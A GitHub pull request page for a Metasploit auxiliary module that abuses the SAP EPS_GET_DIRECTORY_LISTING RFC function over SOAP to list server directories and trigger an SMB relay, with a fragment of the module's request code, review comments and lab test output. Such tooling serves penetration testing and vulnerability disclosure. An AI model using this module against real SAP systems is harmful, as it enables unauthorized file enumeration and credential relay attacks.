Skip to content

EPS_GET_DIRECTORY_LISTING (List Directory and SMB Relay) #1661

Merged
merged 2 commits into from May 9, 2013

3 participants

@nmonkee
nmonkee commented Mar 25, 2013

A vulnerability in the SAP EPS RFC function group allows an attacker to execute an SMB relay attack.

@wchen-r7 wchen-r7 commented on an outdated diff Mar 26, 2013
...p/sap_soap_rfc_eps_get_directory_listing_smb_relay.rb
+ user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
+ begin
+ print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}")
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',}
+ }, 45)
+ if res
+ vprint_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
@wchen-r7
wchen-r7 added a note Mar 26, 2013

How about vprint_error() instead of vprint_status() ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 6, 2013
Merged

SAP module sap_soap_rfc_eps_get_directory_listing cleanup #8

@jvazquez-r7

Hi @nmonkee ,

nmonkee#8 tries to cleanup this pull request. It's applying the same changes proposed on last pull requests such as rapid7#1658. As always feel free to review, test, ask, discuss anything and merge this pull request on your repo when ready. So the original pull request will be automatically updated and we'll be ready to merge :)

Testing after changes:

  • Existing DIR, verbose mode on
msf auxiliary(sap_soap_rfc_eps_get_directory_listing_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to check /tmp
[+] 8042:192.168.172.179 - 16 files under /tmp
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Non existing DIR, verbose mode on
msf auxiliary(sap_soap_rfc_eps_get_directory_listing_smb_relay) > set DIR /tmp/test
DIR => /tmp/test
msf auxiliary(sap_soap_rfc_eps_get_directory_listing_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to check /tmp/test
[-] 192.168.172.179:8042 - Error code: 500
[-] 192.168.172.179:8042 - Error message: Soap document processing failed
[-] 192.168.172.179:8042 - Error body: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>READ_DIRECTORY_FAILED</faultstring><detail><rfc:EPS_GET_DIRECTORY_LISTING.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><Name>READ_DIRECTORY_FAILED</Name></rfc:EPS_GET_DIRECTORY_LISTING.Exception></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@nmonkee nmonkee Merge pull request #8 from jvazquez-r7/sap_soap_rfc_eps_get_directory…
…_listing

SAP module sap_soap_rfc_eps_get_directory_listing cleanup
0b9fb41
@nmonkee
nmonkee commented May 9, 2013

Works well. All good. One small change, though.

@jvazquez-r7

Awesome! merging!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request May 9, 2013
jvazquez-r7 Land #1661, @nmonkee's sap_soap_rfc_eps_get_directory_listing module cf05602
@jvazquez-r7 jvazquez-r7 merged commit 53c08cd into rapid7:master May 9, 2013

1 check passed

Details default The Travis CI build passed
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_eps_get_directory_listing_smb_relay branch May 9, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.